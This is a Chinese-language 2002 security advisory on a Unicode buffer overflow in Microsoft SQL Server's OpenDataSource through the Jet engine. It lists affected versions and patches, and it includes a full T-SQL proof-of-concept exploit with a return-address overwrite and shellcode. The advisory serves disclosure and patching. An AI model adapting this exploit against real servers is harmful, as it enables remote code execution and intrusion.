Microsoft SQL MS Jet引擎unicode缓冲溢出漏洞

发布时间：2002-06-22
更新时间：2002-06-22
严重程度：高
威胁程度：普通用户访问权限
错误类型：边界检查错误
利用方式：服务器模式

BUGTRAQ ID：5057

受影响系统

Microsoft JET 4.0 SP5
Microsoft JET 4.0 SP4
Microsoft JET 4.0 SP3
Microsoft JET 4.0 SP2
Microsoft JET 4.0 SP1
Microsoft JET 4.0
   + Microsoft Access 2000
Microsoft SQL Server 2000 SP2
Microsoft SQL Server 2000 SP1
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a
Microsoft SQL Server 2000
   - Microsoft Windows 2000 Workstation
   - Microsoft Windows 2000 Workstation SP1
   - Microsoft Windows 2000 Workstation SP2
   - Microsoft Windows NT 4.0
   - Microsoft Windows NT 4.0 SP5
   - Microsoft Windows NT 4.0 SP6
   - Microsoft Windows NT 4.0 SP6a

详细描述
Microsoft SQL Server存在基于UNICODE的远程缓冲溢出，问题发生在当OpenDataSource使用MS JET引擎时。

此漏洞可以使攻击者以SQL SERVER权限执行任意代码，攻击需要攻击者传递恶意数据到OpenDataSource函数，可通过基于WEB的软件使用SQL插入实行。

由于问题存在于MS Jet引擎组件中，其他相关MS Jet引擎组件的软件也存在此漏洞。

测试代码
------8<---------

-- Simple Proof of Concept
-- Exploits a buffer overrun in OpenDataSource()
--
-- Demonstrates how to exploit a UNICODE overflow using T-SQL
-- Calls CreateFile() creating a file called c:\SQL-ODSJET-BO
-- I'm overwriting the saved return address with 0x42B0C9DC
-- This is in sqlsort.dll and is consistent between SQL 2000 SP1 and SP2
-- The address holds a jmp esp instruction.
--
-- To protect against this overflow download the latest Jet Service
-- pack from Microsoft - http://www.microsoft.com/
--
-- David Litchfield (david@ngssoftware.com)
-- 19th June 2002

declare @exploit nvarchar(4000)
declare @padding nvarchar(2000)
declare @saved_return_address nvarchar(20)
declare @code nvarchar(1000)
declare @pad nvarchar(16)
declare @cnt int
declare @more_pad nvarchar(100)

select @cnt = 0
select @padding = 0x41414141
select @pad = 0x4141

while @cnt < 1063
begin
select @padding = @padding + @pad
select @cnt = @cnt + 1
end

-- overwrite the saved return address

select @saved_return_address = 0xDCC9B042
select @more_pad = 0x4343434344444444454545454646464647474747

-- code to call CreateFile(). The address is hardcoded to 0x77E86F87 - Win2K
Sp2
-- change if running a different service pack

select @code =
0x558BEC33C05068542D424F6844534A4568514C2D4F68433A5C538D142450504050485050B0
C05052B8876FE877FFD0CCCCCCCCCC
select @exploit = N'SELECT * FROM
penDataSource( ''Microsoft.Jet.OLEDB.4.0'',''Data Source="c:\'
select @exploit = @exploit + @padding + @saved_return_address + @more_pad +
@code
select @exploit = @exploit + N'";User ID=Admin;Password=;Extended
properties=Excel 5.0'')...xactions'
exec (@exploit)

------->8---------

解决方案
补丁下载：

Microsoft SQL Server 2000 SP2:
Microsoft SQL Server 2000 SP1:
Microsoft SQL Server 2000 :
Microsoft JET 4.0 SP5:

Microsoft Upgrade Q282010
http://www.microsoft.com/windows2000/downloads/recommended/q282010/default.asp?FinishURL=%2Fdownloads%2Frelease%2Easp%3FReleaseID%3D38002%26area%3Dsearch%26ordinal%3D2%26redirect%3Dno
Microsoft Jet 4.0 Service Pack 6 (Windows 2000). Requires Microsoft Jet 4.0 Service Pack 5.

相关信息
参考：http://online.securityfocus.com/archive/1/277670

最近严重漏洞

Microsoft SQL MS Jet引擎unicode缓冲溢出漏洞